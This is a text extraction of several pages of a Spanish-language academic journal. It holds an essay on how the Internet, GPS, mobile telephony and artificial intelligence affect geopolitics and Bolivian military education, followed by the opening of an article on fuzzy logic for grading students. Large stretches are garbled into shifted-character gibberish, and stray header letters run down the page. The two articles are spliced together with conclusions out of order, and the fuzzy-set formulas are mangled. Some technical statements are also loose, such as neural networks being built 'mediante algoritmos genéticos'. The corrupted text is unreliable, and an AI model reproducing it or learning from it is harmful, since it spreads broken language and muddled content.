A
D
I
G
M
A
33
P
A
I.- DESARROLLO GEOPOLÍTICA
Karl Ritter
“Geopolítica es la ciencia que, considerando a la
Geografía como ciencia del globo viviente, estudia
los aspectos morales y materiales del mundo, para
prever y orientar el desarrollo de las naciones, en el
X\L PUÅ\`LU WYVM\UKHTLU[L SVZ MHJ[VYLZ NLVNYmÄcos”.
Friedrich Ratzel
R
A
“La Geopolítica es la ciencia que establece que las
JHYHJ[LYxZ[PJHZ`JVUKPJPVULZNLVNYmÄJHZ`T\`LZpecialmente, los grandes espacios, desempeñan un
papel decisivo en la vida de los Estados y que el
individuo y la sociedad humana dependen del suelo
en que viven, estando su destino determinado por
las leyes de la Geografía. Proporciona al conductor
WVSx[PJVLSZLU[PKVNLVNYmÄJVULJLZHYPVWHYHNVILYnar”.
Rudolf Kjellen
D
I
“La Geopolítica es la teoría del Estado como orNHUPZTVNLVNYmÄJVVMLU}TLUVLULSLZWHJPVLZ
decir, el Estado como tierra (país), territorio, dominio o más distintamente como reino. Como Ciencia
Política tiene siempre en vista la unidad del Estado.
La Geopolítica es la ciencia del Estado como orgaUPZTVNLVNYmÄJV`ZPNUPÄJH[P]HTLU[LJVTLU[HYPVZ
físicos, humanos y políticos.
Teorías que respaldan el impacto de la Informática
en la Geopolítica
G
Respecto a la investigación que nos impulsa a la
investigación podemos mencionar qué el “sistema
nacional” y el “sistema mundial” son, para Brucan
, el punto de partida, mientras que la “integración
nacional” y la “integración supranacional”, su punto
de llegada.
M
En su primer modelo, que se plantea, hace que las
naciones se comporten de manera distinta, y se encuentra compuesto por cinco variables:
A
34
1. Los factores materiales-naturales básicos
referidos al tamaño del territorio y la poblaJP}UZP[\HJP}UNLVNYmÄJH`SHZM\LYaHZWYVductivas, es decir respecto a la posible producción de las diferentes zonas de cualquier
Estado o Nación.
2. Fuerzas y estructuras sociales diferenciando en clases y grupos sociales, naciones y
nacionalidades, las mismas que pueden ser
consideradas potencialmente para su emWSLVLUJ\HSX\PLY[PWVKLJVUÅPJ[V
3. Factores contingentes y situacionales como
las crisis, golpes de Estado, elecciones,
huelgas masivas, violencia a gran escala, acciones militares y guerra, que son una parte
de la historia, que servirá como elemento de
información a los usuarios.
4. El sistema estatal como la maquinaria nacional de toma de decisiones, el aparato estatal,
o el gobierno, que le permita obtener datos
relacionados con todos los factores de poder
para adoptar una adecuada medida de decisión.
5. El liderazgo como la forma en que el poder
es usado y dirigido, considerando que el que
tiene la información tiene el poder, en ese
sentido su explotación será muy importante
para una adecuada decisión en cualquiera
sea ámbito en el que se trabaje.
Este modelo, fue diseñado para entender al “sistema mundial”, que según Brucan “está basado en
ciertas estructuras y construido a partir de unidades -los Estados- cuyas actividades se ajustan a
la dinámica interna del sistema mundial, desplegando cierto grado de regularidad, y funcionando
conforme a determinados principios de conducta”.
De donde podemos señalar que este modelo está
basado en un sistema de cuatro variables:
6. La presión de la tecnología moderna y de la
interdependencia; La política del poder; La
H\[VHÄYTHJP}UKLSHZUHJPVULZ"`,SJHTIPV
social.
La esencia de esta dinámica es resumida por Brucan de la siguiente forma: “Dado que la tecnología moderna no tiene un impacto directo sobre la
política, la presión de la tecnología y de la interdependencia hace sentir un impacto tanto sobre las
relaciones de clase dentro de la sociedad como un
poderoso motor del cambio social, así como sobre las relaciones entre las naciones, en sus dos
encabezados principales: «la política del poder», la
cual hoy básicamente asume la forma de rivalidad
y dominio de las superpotencias, y su respuesta
JVU[YHYYLZ[HU[L SH H\[VHÄYTHJP}U KL SHZ UHJPVULZ
pequeñas y en desarrollo. Esta es, esencialmente,
la dinámica de la política mundial”
9LÄYPtUKVUVZ H SH ]LYKHKLYH LZLUJPH KLS PTWHJ[V
que ejerce en la Geopolítica podemos indicar que la
Informática proporcionará una serie de datos útiles,
tales como registros estadísticos sobre la producción, demografía, minería, comercio, vías de comunicación, etc.; para el desarrollo de las naciones.
C.- Internet
Los orígenes de INTERNET que es motivo de nuestra investigación respecto a la GEOPOLÍTICA, diremos que ésta se remonta a 1969 con ARPAnet
que era una red experimental desarrollada en los
EE.UU. por la DARPA, (AGENCIA DE PROYECTOS
DE DEFENSA PARA EL ADELANTO DE LA INVESTIGACIÓN), con el objetivo de proporcionar a los
investigadores en temas militares el acceso a las
fuentes de información existentes en distintos lugares y facilitar la utilización de los recursos de computación disponibles. ARPAnet permitía a los usuarios disponer del servicio de correo electrónico, el
acceso de un usuario a otra computadora conectaKVHSHYLK`SH[YHZMLYLUJPHKLÄJOLYVZLU[YLLSSVZ
3VZ JPLU[xÄJVZ KL (97( PU]LZ[PNHYVU SH PU[LYJVnexión entre redes, lo cual se denominó interredes
(internetwork) . Este término se abrevió como INTERNET, y se aplicó a los proyectos de redes y a las
redes prototipo que se desarrollan. Para distinguir
este medio de las demás redes ARPA decidió escribir el nombre con “i” minúscula cuando se referían
a las “internets” en general y, con I mayúscula a su
prototipo experimental. Se sostiene que esta idea
se ve impulsada y favorecida por la necesidad estratégica de disponer de una red no centralizada,
de manera que la posible destrucción de una parte
de la red ante un ataque nuclear o cualquier otro
con efectos devastadores, no detenga su funcioUHTPLU[V ,Z T\` KPMxJPS KHY \UH KLÄUPJP}U L_HJ[H
KLSVX\LLZ0U[LYUL[WLYVW\LKLKLÄUPYZLJVTVSH
unión a nivel mundial de miles de redes de computadoras, que se pueden comunicar entre sí gracias
a un conjunto de normas y lenguajes comunes de
comunicaciones denominadas protocolos .
Considero fundamental el conocer asimismo como
se realiza la comunicación en la red, es decir cuando se va a intercambiar información o algún dato
entre “dos computadoras”, una que origina la información y otra que la recibe, de este aspecto se encargan los protocolos que habíamos mencionado
HU[LYPVYTLU[LHZxJVTVKLSHPKLU[PÄJHJP}UKLSH
máquina emisora y del tipo de mensaje que se pretende distribuir, las reglas que tienen que seguir las
computadoras para poder intercambiar información
entre sí, e indicar que los mensajes o la información
se la envía por paquetes .
De toda esta parte teórica podemos rescatar cómo
la informática podría apoyar o lograr impacto en la
geopolítica, considerando que la información regional o fundamentalmente aquellos aspectos que
tiene relación con la cantidad de población, la conÄN\YHJP}UKLHSN\UHWHY[LKLS[LYYP[VYPV`V[YVZKH-
tos ya sean estadísticos o cualquier otro se podrá
apreciar con mucho detalle con sólo acceder a una
página WEB (Documentos que están compuestos
WVY[L_[VLSLTLU[VZT\S[PTLKPHNYmÄJVZZVUPKV
vídeo digital...) y vínculos (punteros con la dirección
de otras páginas Web, empleados para establecer
una conexión automática). Un lugar en Web mantiene en ejecución un programa llamado «servidor de
páginas Web» que procesa las peticiones de información, típicamente solicitudes de páginas. Cada
documento en uno de estos lugares tiene asignada
una dirección única denominada URL).
1.- Impacto
En el Factor Político
Su explotación adecuada permitirá al factor Político
establecer con exactitud las necesidades respecto
a la ubicación de los límites fronterizos con los países que nos rodean. Asimismo contar con los datos
necesarios respecto al avance o desarrollo de las
diferentes regiones del País.
En el Factor económico
Permitirá contar con la información adecuada respecto a los datos estadísticos y tablas de producción de las diferentes regiones del País, asimismo
se podrá establecer los contactos con todo el orbe
JVU SH ÄUHSPKHK KL YLHSPaHY SHZ [YHUZHJJPVULZ JVmerciales con otros mercados directamente accediendo a una de las direcciones que proporciona
INTERNET, ya sea para la exportación de nuestros
productos así como para la importación de algunos
productos sin necesidad de realizar viajes hasta el
lugar de procedencia. Además su explotación en
este caso incide más en la construcción de vías camineras que facilitan la vertebración del territorio.
En el factor psicosocial
Considerando el sector educativo, permitirá acceder a información de importancia y de actualidad
en la juventud estudiantil en todos los niveles de la
educación respecto a temas de investigación satisfaciendo sus expectativas y las exigencias del
estudio.
Por otra parte permitirá también en lo referido a la
salud, realizar intercambios de conocimiento así
como satisfacer las exigencias de necesidad de
medicamentos que no puedan ser suministrados
en el País para su pronta importación desde cualquier punto del planeta, facilitando la servidumbre
que podría provocar su ubicación en el mercado
exterior.
P
A
R
A
D
I
G
M
A
35
P
A
R
A
D
I
G
M
A
36
En el Factor Militar
Permitirá acceder a información actual referida al
posible potenciamiento de la Fuerzas Armadas de
los diferentes países que rodean al País, determinado sus efectivos, su armamento, así como sus
posibilidades, resulta más fácil de determinar. La
amplia gama de áreas que tiene establecida INTERNET, facilita a los usuarios acceder a informaciones
o realizar las previsiones que permitan hacer frente
a cualquier amenaza externa, en este sentido el impacto de la Informática en la Geopolítica se traduce
en la elaboración de tablas de Bases de Datos capaces de almacenar información en coordinación
con la Corte Nacional Electoral, como ente centralizador de los Registros Civiles del País, contar
con una información detallada, acerca del personal
disponible de acuerdo a las categorías establecidas
para la ejecución de las OO.EE.PP. que le permitirán al conductor militar conocer de cuanto personal
dispone para la ejecución de las operaciones, que
se podrían presentar como amenaza a la seguridad
nacional.
Asimismo para la ejecución de comercialización o
transacciones acerca del equipamiento o potenciamiento respecto a la adquisición de uniforme y
equipo así como de armamento, pudiendo acceder
a una serie de ofertas que se encuentran a disposición del usuario.
D.- Sistema de Posicionamiento Global (GPS)
GPS, es un sistema de navegación basado en
24 satélites, que proporcionan posiciones en tres
dimensiones, velocidad y tiempo, las 24 horas
del día, en cualquier parte del mundo y en todas
las condiciones climáticas. Al no haber comunicación directa entre el usuario y los satélites, el
GPS puede dar servicio a un número ilimitado de
usuarios.
El Sistema de Posicionamiento Global (GPS) está
disponible en dos formas básicas: SPS, iniciales de
Standard Positioning Service (Servicio de Posicionamiento Estándar), y PPS, siglas de Precise Positioning Service (Servicio de Posicionamiento Preciso). El SPS proporciona la posición absoluta de
los puntos con una precisión de 100 m. El código
PPS permite obtener precisiones superiores a los
20 m; este código es accesible sólo a los militares
de Estados Unidos y sus aliados, salvo en situaciones especiales. Las técnicas de mejora, como
el GPS diferencial (DGPS), permiten a los usuarios
alcanzar hasta 3 m de precisión. Los investigadores
fueron los primeros en usar portadoras para calcular posiciones con una precisión de 1 cm. Los sa-
télites GPS llevan relojes atómicos de alto grado de
precisión.
La información horaria se sitúa en los códigos de
transmisión mediante los satélites, de forma que
un receptor puede determinar en cada momento
en cuánto tiempo se transmite la señal. Esta señal
contiene datos que el receptor utiliza para calcular
la ubicación de los satélites y realizar los ajustes
necesarios para precisar las posiciones. El receptor
utiliza la diferencia de tiempo entre el momento de
la recepción de la señal y el tiempo de transmisión
para calcular la distancia al satélite. El receptor tiene en cuenta los retrasos en la propagación de la
señal debido a la ionosfera y a la troposfera. Con
tres distancias a tres satélites y conociendo la ubicación del satélite desde donde se envió la señal,
el receptor calcula su posición en tres dimensiones.
Considerando las bondades del GPS, se puede indicar que su aplicación permitió obtener con precisión la ubicación de los objetivos en la Guerra
del Golfo Pérsico, de donde deducimos que su
explotación podrá apoyar a las intenciones de expansión de la geopolítica de las naciones, respecto a su empleo el mismo que esta basándose en
sistemas informáticos y de avanzada tecnología,
JVUÄYTHUKVKLLZ[HTHULYHX\LSHPUMVYTm[PJHH
ampliado sus servicios de no sólo aplicación en aspectos domésticos sino también en la geopolítica;
la misma que permitirá la obtención de una inforTHJP}U ÄKLKPNUH YLZWLJ[V H HSN\UVZ HZ\U[VZ KL
interés para la ejecución de una serie de planes en
ILULÄJPVKLSHZVWLYHJPVULZM\[\YHZVZPTWSLTLUte en calidad de información para ampliar la gama
de la geopolítica.
Impacto
En el factor militar
Permitirá determinar con exactitud la ubicación de
los hitos de nuestra línea de frontera, aspecto que
incide en la preparación de las fuerzas para tomar
en cuenta la seguridad nacional del País. Evitando
cualquier violación de nuestro territorio. Asimismo
LUSHHJ[\HSPKHKLS0UZ[P[\[V.LVNYmÄJV4PSP[HYLTWSLHLZ[LTLKPVWHYHLSSL]HU[HTPLU[V[VWVNYmÄJV
y el trazado de las proyecciones de las vías de comunicación.
En el factor económico
Contar con los datos de ubicación exacta de las
poblaciones alejadas de la urbe, para proyectar una
vinculación caminera que les permita la comercialización de sus productos en el mercado interno,
impulsando al avance o desarrollo de las diferentes
regiones del País.
Telefonía móvil
Hoy en día nadie se sorprende al contemplar como
las personas se comunican desde su automóvil o
simplemente utilizando radioteléfonos portátiles.
Estos últimos ofrecen obvias ventajas con respecto al radioteléfono “FIJO” instalado en el automóvil, ya que este último, con un “kit” de adaptación,
se puede usar como equipo portátil o equipo móvil
para el automóvil. Por ello hay dos aspectos a tener en cuenta, la evolución de las comunicaciones
móviles, el peso de los equipos portátiles y la autonomía de la batería. La tendencia en este momento es disponer de equipos portátiles del tamaño
de una tarjeta y de gran autonomía, ofrecerá a los
usuarios disponer adicionalmente de una terminal
para los pequeños radioteléfonos portátiles, con
las mismas prestaciones que el teléfono de mesa.
Esta tecnología es conocida con el nombre “Cordless telephone” o telefonía sin hilos. Aprovechando
este principio de la telefonía móvil se puede asociar
a la posibilidad de formar parte de la red con una
conexión a INTERNET con todas las ventajas que
se podría obtener como cuando se encuentra en
un servidor o terminal en un lugar con las condiciones de comodidad adecuadas, es decir con una
conexión física con el servidor general, sin ningún
tipo de restricciones, la única que podría ser considerada como tal es la disponibilidad de baterías
recargables para establecer la comunicación ya
sea con INTERNET o con cualquier terminal. De
esta manera se podrá evitar el cambio del equipo
en función del entorno en que se halle . Toda esta
teorización de la Informática permite a la geopolítica disponer de medios necesarios para acceder a
información ya sea del tipo texto, video, bases de
datos o estadísticos que contribuirán a la ejecución
de las operaciones militares, de ahí su impacto para
con esta ciencia.
Las comunicaciones por satélite pueden tener una
incidencia interesante en las aplicaciones debido a
la capacidad de difusión intrínseca a las comunicaciones por vía satélite, así como los movimientos de liberalización de las telecomunicaciones .
El término VSAT utilizado a nivel internacional, sigUPÄJH ¸=LY` :THSS (WLY[\YL ;LYTPUHS¹ ;LYTPUHS KL
HILY[\YHT\`WLX\L|HLUSLUN\HQLSSHUVZLYLÄLYL
al tamaño de la antena, que usualmente es 1,2 ó
1,6 metros de diámetro. Esta posibilidad es debida
fundamentalmente a los avances tecnológicos, que
han permitido incrementar la potencia de transmisión del satélite, lo que produce una mejora en el
nivel de la señal de recepción. Esta situación per-
mite una economización de recursos debido al gran
[YmÄJVX\LZVWVY[HKLLZ[HJPVULZ[LYYLUHZLZ[HZPtuación permite a la geopolítica establecer todas
las medidas de seguridad en la preparación de la
defensa nacional y de la conducción estratégica facilitando las previsiones a considerar en caso de un
JVUÅPJ[VPUTPULU[L
Impacto
P
A
En el factor económico
El gran alcance de estos equipos a permitido incursionar en el mundo de los negocios accediendo a
las transacciones desde el lugar donde se encuentre, facilitando de esta manera a las comunicaciones así como la de generar nuevos ingresos, en beULÄJPVKLS,Z[HKV
En el factor militar
De gran empleo en el tema de las comunicaciones
porque pudo reemplazar con facilidad a otros medios mucho más obsoletos como las radios (transmisores-receptores), ya que por su practicabilidad
y su independencia de la línea física, así como el
empleo de fuentes de poder con tamaño considerable, logró reemplazar y satisfacer la necesidad de
comunicar habiéndose obtenido resultados satisMHJ[VYPVZ LU SVZ ‚S[PTVZ JVUÅPJ[VZ VJ\YYPKVZ LU LS
Altiplano Boliviano en el desarrollo de las operaciones, facilitando la comunicación con las unidades
vecinas, así como con el Estado Mayor General.
3H0U[LSPNLUJPH(Y[PÄJPHS
0U[LSPNLUJPH HY[PÄJPHS [tYTPUV X\L LU Z\ ZLU[PKV
más amplio, indicaría la capacidad de un artefacto de realizar los mismos tipos de funciones que
caracterizan al pensamiento humano. La posibilidad de desarrollar un artefacto así ha despertado
la curiosidad del ser humano desde la antigüedad.
Con el avance de la ciencia moderna la búsqueda
KLSH0U[LSPNLUJPH(Y[PÄJPHSOH[VTHKVKVZJHTPUVZ
M\UKHTLU[HSLZ!SHPU]LZ[PNHJP}UWZPJVS}NPJH`ÄZPVlógica de la naturaleza del pensamiento humano, y
el desarrollo tecnológico de sistemas informáticos
cada vez más complejos.
,ULZ[LZLU[PKVLS[tYTPUV0U[LSPNLUJPH(Y[PÄJPHSZL
ha aplicado a sistemas y programas informáticos
capaces de realizar tareas complejas, simulando el
funcionamiento del pensamiento humano, aunque
todavía muy lejos de éste. En esta esfera los campos de investigación más importantes son el procesamiento de la información, el reconocimiento
de modelos, los juegos y las áreas aplicadas como
R
A
D
I
G
M
A
37
P
A
R
A
D
el diagnóstico médico. Algunas áreas de la investigación actual del procesamiento de la información
están centradas en programas que permiten a un
ordenador o computadora comprender la información escrita o hablada, y generar resúmenes, resWVUKLYHWYLN\U[HZLZWLJxÄJHZVYLKPZ[YPI\PYKH[VZ
a los usuarios interesados en determinados sectores de esta información. En esos programas es
esencial la capacidad del sistema de generar frases
gramaticalmente correctas y de establecer vínculos
entre palabras e ideas. La investigación ha demostrado que mientras que la lógica de la estructura del
lenguaje, su sintaxis, está relacionada con la proNYHTHJP}ULSWYVISLTHKLSZPNUPÄJHKVVZLTmU[Pca, es mucho más profundo y va en la dirección de
\UHH\[tU[PJHPU[LSPNLUJPHHY[PÄJPHS
Actualmente existen dos tendencias en cuanto al
KLZHYYVSSVKLZPZ[LTHZKL0U[LSPNLUJPH(Y[PÄJPHS!SVZ
sistemas expertos y las redes neuronales. Los sistemas expertos intentan reproducir el razonamiento
humano de forma simbólica. Las redes neuronales
lo hacen desde una perspectiva más biológica (recrean la estructura de un cerebro humano mediante
algoritmos genéticos). A pesar de la complejidad de
ambos sistemas los resultados distan mucho de un
auténtico pensamiento inteligente.
Impacto
En el Factor Militar
I
G
M
A
38
Proporciona una serie de ventajas ante la posibilidad de contar con simuladores que permitan
obtener o determinar la reacción aproximada a la
realidad acerca de simuladores de vuelos, simuladores de explosiones, simuladores de dispositivos
militares y sus efectos, contribuyendo al conductor
militar, tomar las previsiones para las operaciones
futuras basándose en el conocimiento previo.
En el Factor Económico
Permitirá obtener una serie de proyecciones en
base a datos estadísticos para determinar la posible población para la siguiente década, así como
el índice de mortandad en una determinada región,
asimismo, proporcionar información sobre la proyección productiva de una determinada región.
En el factor Psicosocial
Permitirá obtener información sobre las tendencias
y los posibles hechos que se sucederán basándose
en los datos que se le proporcione al ordenador,
considerando las tensiones de los diferentes sectores sociales de un Estado.
Otros conceptos
Todos los que aplicaron los conocimientos geoNYmÄJVZ LU SH JVUK\JJP}U WVSx[PJH OPJPLYVU HJción geopolítica. Por lo tanto, los precursores de
la Geopolítica son numerosos y abarcan a ilustres
NL}NYHMVZ JPLU[xÄJVZ ÄS}ZVMVZ LZ[HKPZ[HZ LZ[YHtegas, exploradores y navegantes de casi toda la
historia universal. El estudio pragmático del espacio geopolítico se apoya en las amplias bases del
conocimiento teórico geopolítico, su cometido es
asesorar (orientar, guiar y aconsejar) al estadista y
al militar (estratega) en general.
Tomando en cuenta que la Geopolítica enfoca sus
estudios fundamentalmente en un espacio geopolítico extenso, que puede ser el mundo; una región;
un Estado; una Nación; un conjunto de Estados o
\UmYLHLZWLJPÄJHWLY[LULJPLU[LH\UVVTmZ,Z[Hdos, y para mantener ligados todos estos espacios
con información textual o en su defecto visual de
algunas zonas; se tendrá que recurrir a la informática, la que con sus bondades y su alta tecnología
permitirá obtener amplias informaciones, las mismas que podrán ser recibidas de manera oportuna
por la característica de la informática de realizar la
administración de la información en forma automática.
7HYH ÄUHSPaHY LZ PTWVY[HU[L ZL|HSHY X\L LU SH HJtualidad la Geopolítica ha logrado su total autonomía, luego de recorrer un camino cubierto de contrariedades; dentro de ella, los estadistas, políticos,
diplomáticos y todos los componentes de un Estado, debemos comprender que se trata de la eterna
lucha entre el espacio (territorio) y el hombre (Estado) para lograr mejores niveles de vida, y, por otra
parte, entre el Estado y otros Estados, para dirimir
sus pretensiones.
E.- Sociedad, tecnología y educación militar.
La tecnología constituye una variable cuyo impac[VPUÅ\`LWVKLYVZHTLU[L[HU[VLULSKLZHYYVSSVVYganizacional de una determinada entidad, como el
SVNYV KL Z\Z TL[HZ LZWLJxÄJHZ :PU LTIHYNV Z\
correcta aplicación, no sólo requiere del análisis de
determinadas necesidades o de los medios que se
encuentran a nuestra disposición. Exige, por sobre
todo los supuestos existenciales de la institución u
organización en la cual se va a aplicar.
En la actualidad se viene insistiendo que en una
época donde la información es determinante, la
[LJUVSVNxHHWVY[HKLTHULYHZPNUPÄJH[P]HHSVZWYVcesos de desarrollo del talento humano.
“En el ámbito militar, la incorporación de la tecnología a los sistemas de la educación se ha veniKV ]LYPÄJHUKV KLZKL OHJL IHZ[HU[L [PLTWV @ KL
hecho ha servido de guía para la incorporación a
otras entidades educativas. La necesidad de caWHJP[HY LU KL[LYTPUHKHZ mYLHZ H VÄJPHSLZ ` Z\IVÄJPHSLZ LU WSHaVZ YLK\JPKVZ KL LZWLJPHSPaHY LU LS
uso de determinadas armas, o sistema de arma, o
de entrenamiento a los mandos y sus asesores, ha
hecho necesario recurrir al desarrollo o adaptación
de nuevas tecnologías de enseñanza, tales como
sistemas de simulación y de auto-instrucción” . Sin
embargo el empleo de tecnología no determina por
si sola la optimización de los resultados en las diferentes realidades en que están insertas las distintas instituciones. Las características particulares
de su recurso humano, la brecha tecnológica entre
los distintos países, el modelo de organización son
aspectos que deben estar presentes a la hora de
decidir que sistemas o procedimientos tecnológicos es necesario incorporar y que sentido debemos
darles a los mismos. Baste señalar que hay Ejércitos cuyo marco valórico, formas de compensación,
estilo de vida de sus integrantes son más próximos
a un modelo “ocupacional”, es decir orientado a la
disposición de los posibles destinos de su persoUHS JVUZPKLYHUKV Z\Z OHIPSPKHKLZ J\`V WLYÄS LZ
diferente a otros que mantienen un modelo más
cercano al “institucional”, que busca lograr mayor
profesionalidad dentro de su estructura, ello marcó
diferencias que no se pueden eludir.
La Tecnología y su Impacto en la Educación Militar
La preparación de los recursos humanos mediante el empleo de tecnología, invariablemente lleva
a pensar en el concepto de tecnología de la información, entendiendo como tal al conjunto de herramientas y metodología sustentadas en un medio digital con el propósito de apoyar la toma de
decisiones o los procesos educativos aspecto este
último directamente relacionado con nuestro tema.
En este sentido, es necesario establecer la esencia del concepto en sí, lo que implica aceptar que
SH[LJUVSVNxHLUILULÄJPV`HWV`VKLSHLK\JHJP}U
se encuentra en permanente estado de evolución,
derivado del cambio en computadores personales,
del software o programas computacionales y de los
sistemas de comunicación de datos.
La tecnología de la información se ha nutrido de
la unión de los avances de la informática y de las
telecomunicaciones, produciendo una revolución
en el dominio y valor del conocimiento al hacerlo
accesible a los más variados sectores, cambiando, por consiguiente, las concepciones clásicas
de educación generalmente aceptadas, en donde
ciertos formalismos derivados de la interrelación
educador–educando dentro del aula, han sido ampliados a un concepto en que la globalidad e interacción es la esencia de los nuevos métodos de
enseñanza. Hoy en día la información es sinónimo
de poder, y sus herramientas de operación son el
acceso, la rapidez de su obtención y la capacidad
de almacenamiento.
En la actualidad todas las reparticiones que se
LUJ\LU[YHU IHQV SH PUÅ\LUJPH KLS THULQV KL SH PUformación en forma automática han estandarizado
Z\ZZPZ[LTHZPUMVYTm[PJVZJVULSÄUKLVI[LULYLS
máximo partido de las tecnologías. Esta última característica se consideró fundamental, puesto que
el impacto de las tecnologías de la información en
la mejora de la gestión organizacional se relaciona
a la disposición para invertir en forma oportuna y en
los montos necesarios, en los recursos humanos.
Impactos y riesgos involucrados
El desarrollo de la tecnología de la información y su
THZPÄJHJP}U OH NLULYHKV JHTIPVZ KYHTm[PJVZ LU
la sociedad. Algunos investigadores han realizado
estudios acerca de la repercusión de dicho fenómeno causa en determinadas organizaciones. En
tal sentido podemos indicar que se han producido
cambios cualitativos en el medio ambiente de las
personas, ya que el número de niveles jerarquizados tiende a reducirse, y aunque en algunos casos
se obtengan ejemplos contrarios, se ve sobrepasada la concepción tradicional de amplitud de control. Además, se producen cambios en la estructura
de la organización y hay efectos diferenciados en
los componentes de la organización, es decir, la
tecnología no afecta por igual a todos.
Por otra parte la preparación del recurso humano
KLU[YVKLSHVYNHUPaHJP}UTPSP[HYZL]LUYLÅLQHKVZ
en los adelantos que vienen demostrando todo
este personal que explota al máximo la información
de la tecnología. Por otra parte los cambios cuali[H[P]VZZLTHUPÄLZ[HUJVTV\UWYVJLZV[YHUZKPZJPplinar dinámico, interactivo y colaborador entre los
diversos involucrados, lo que implica que el docente pierde parte de su connotación presencial y autoritaria, variando hacia una imagen de inducción y
complementación centrada en el educando.
CONCLUSIONES
Una adecuada explotación, de los medios que
pone a disposición la informática, en INTERNET,
brindara una serie de ventajas a los usuarios, sin
JVUZPKLYHYLZWLJxÄJHTLU[LLS[PWVKL\Z\HYPVW\-
P
A
R
A
D
I
G
M
A
39
P
A
R
A
D
diendo ser explotado en el área de la educación,
la economía, las estadísticas, los comercios, datos
regionales, actualidades respecto al adelanto de algunos países, y una serie de ventajas que permiten
su explotación y contribución a la geopolítica de las
naciones.
La implementación de los medios necesarios para
que las instituciones que ejercen la educación
puedan acceder a éste servicio, permitirá en este
universo contar con un conocimiento actualizado
acorde a los adelantos de la tecnología.
El adecuado adiestramiento en el manejo de los
GPS y la preparación de elementos para el manejo
de los diferentes medios que permite o brinda la
tecnología al servicio de la geopolítica, logrará satisfacer las necesidades de precisión en el trazado
de las vías de comunicación así como en la ubicaJP}UL_HJ[HKLHSN\UVZHJJPKLU[LZNLVNYmÄJVZ[HS
como la ubicación de los hitos en contribución o
como elemento coadyuvante a las relaciones exteriores del País.
todo el personal, como un recurso de precisión y
manejo de información, estimulando asimismo al
personal de la institución a la investigación. Esto no
solamente para el sector militar, asimismo al sector estudiantil en todos los niveles les permite estar
actualizados con los adelantos tecnológicos de la
humanidad y a la par de los nuevos desafíos del
nuevo orden mundial.
E. Las decisiones y actividades externas de
las naciones, son respuestas a una variedad
de estímulos tanto internos como externos,
las naciones son sistemas con estímulos
(“inputs” o entradas), reacciones (“outputs” o
salidas) y retroalimentación (“feedback”), en
interacción constante con el medio ambiente
internacional, ante esta situación la complejidad de la informática permitirá contribuir de
THULYHZPNUPÄJH[P]HHSH.LVWVSx[PJH
F. La aplicación de sistemas simuladores permitirá grandes ventajas en todos los factores
KLWVKLYILULÄJPHUKVH[VKHSHJVSLJ[P]PKHK
en su conjunto.
Se hace necesaria la implementación de un Sistema Informático en el Ejército boliviano accesible a
I
G
M
A
40
Laboratorio de Redes
DIFUSIDAD EN EL RENDIMIENTO
ACADÉMICO
Luisa Velásquez López
Instituto de Investigaciones en Informática – Universidad Mayor de San Andrés
Av. Villazon (La Paz) Bolivia
Tel. 79543904; [email protected]
RESUMEN
La investigación teórica y la experiencia académica
da como resultado el siguiente artículo.
La evaluación del desempeño de los estudiantes,
desde el ámbito pedagógico, es una actividad demasiado compleja, porque debe tomar en cuenta
muchos aspectos. La presente investigación no se
considera como una herramienta de evaluación del
estado cognitivo del estudiante, más bien presenta
una faceta, para medir el nivel de conocimiento utilizando, la imprecisión, y la necesidad de un medio
de almacenamiento para las mismas.
La Lógica Borrosa es una teoría empleada para maULQHYSHPTWYLJPZP}UWYVW\LZ[HWVY3V[ÄAHKLOLU
1965. La principal aplicación de la lógica borrosa
se encuentra en el control y a partir de los 80 se
extiende su uso, en problemas de la vida diaria.
Los conjuntos crisp o conjuntos clásicos están deÄUPKVZWVYZ\M\UJP}UJHYHJ[LYxZ[PJH!
enfrentar situaciones del mundo real, situaciones
complejas y dinámicas, de la misma forma existe la
necesidad de almacenar dicha información en una
base de datos borrosa.
La evaluación del estudiante a partir de medidas
[YHKPJPVUHSLZ WYLZLU[H JPLY[HZ KPÄJ\S[HKLZ WVYX\L
el docente puede asignar notas imprecisas dependiendo de la experiencia y la sensibilidad, porque en
realidad la nota que se le asigna a un estudiante es
una aproximación humana cuando evalúa los exámenes.
Es importante hacer notar que cuando el docente
evalúa, generalmente utiliza términos lingüísticos
como, excelente, bueno, regular, las cuales son
ambiguos y totalmente subjetivos y la lógica difusa
es la apropiada para proporcionar etiquetas lingüísticas. Como se ve en la Fig. 1, se tiene el universo
del discurso [0,100] (notas de evaluación utilizaKHZ`ZLW\LKL]LYX\LLZPUZ\ÄJPLU[LWLYV
LZTLUVZPUZ\ÄJPLU[L
xA : X {0,1}
_(_$b_?c_ ?d
›A: X [0,1]
y sus operaciones: Unión, Intersección, Diferencia,
Complemento.
Los conjuntos clásicos permiten el almacenamiento
KLSHPUMVYTHJP}UKLTHULYHIPLUKLÄUPKHWVYX\L
sus valores de umbral, tienen dos valores de verdad: verdadero ó falso, 1 ó 0, sí ó no.
Pero muchos de los problemas expresadas por las
personas son de forma ambigua, y la lógica borroZHIHZHZ\KLÄUPJP}ULU\TIYHSLZKLKLJPZP}UWHYH
A
R
A
D
I
G
y sus operaciones básicas: Unión, Intersección, Diferencia.
7VYV[YVSHKVSVZJVUQ\U[VZIVYYVZVZLZ[mUKLÄUPdos por su función de pertenencia:
P
Fig. 1 Representación de conjuntos difusos
Las etiquetas lingüísticas permiten a los docentes,
KLÄUPYZ\ZLZ[YH[LNPHZKLL]HS\HJP}U
M
ABSTRACT
Theoretical research and academic experience results in the following article.
The evaluation of student performance, from the
pedagogical, is an activity too complex because
it must take into account many aspects. This research is not considered as an assessment tool of
student’s cognitive state, rather represents a facet,
A
41
P
A
R
A
D
I
G
M
A
42
to measure the level of knowledge using, imprecision, and the need for a storage medium for them.
Fuzzy Logic is a theory used to handle the impreJPZPVUWYVWVZLKI`3V[ÄAHKLOPU ;OLTHPU
application of fuzzy logic is in control and from the
80 it is widely used in daily life problems.
*YPZWZL[ZHUKJSHZZPJHSZL[ZHYLKLÄULKI`P[ZJOHracteristic function:
xA: X {0,1}
_(_$b_›?c_ ›?d
and its basic operations: Union, Intersection, Difference.
6U [OL V[OLY OHUK M\aa` ZL[Z HYL KLÄULK I` P[Z
membership function:
›A: X [0,1]
and operations: Union, Intersection, Difference,
Complement.
The classical ensembles allow storage of informa[PVUPUH^LSSKLÄULKILJH\ZL[OLPY[OYLZOVSK]HS\LZ
have two truth values: true or false, 1 or 0, yes or no.
But many of the problems expressed by people are
HTIPN\V\Z HUK M\aa` SVNPJ IHZLK P[Z KLÄUP[PVU VU
decision thresholds to address real-world situations,
complex and dynamic situations, just as there is a
need to store that information in a fuzzy database.
Student evaluation from traditional measures has
